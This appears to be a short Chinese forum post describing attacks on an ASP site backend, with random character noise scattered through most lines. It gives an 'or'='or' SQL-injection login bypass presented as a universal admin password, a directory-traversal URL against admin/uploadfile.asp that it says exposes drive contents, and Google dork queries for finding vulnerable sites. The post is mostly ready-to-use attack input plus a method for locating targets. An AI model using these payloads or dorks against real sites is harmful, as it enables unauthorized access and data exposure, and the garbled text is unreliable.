后台万能密码 'or'='or': d1 R j* x) [! q7 p& _/ v1 T- w
' t/ x7 U- F4 @0 s' R4 l9 c4 q
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!! }2 ^, z6 L3 R7 E2 G! m
admin/uploadfile.asp?currentFolder=/upfiles/../
9 R. @, d% R* @( p# i0 F! t, W5 T/ q- J, ~* g1 s/ V
漏洞证明:8 x* ?1 ^; ?+ s
3 H' \' B+ \+ b, p3 N; o+ ^5 ~谷歌:inurl:type.asp?id=1 新闻中心
; i% ?, L( n4 ^* Z% k或者 :inurl:download_ok.asp?8 r! r% H6 i. @( C: {& M8 _
* w) x8 \6 V, \2 i" R& M |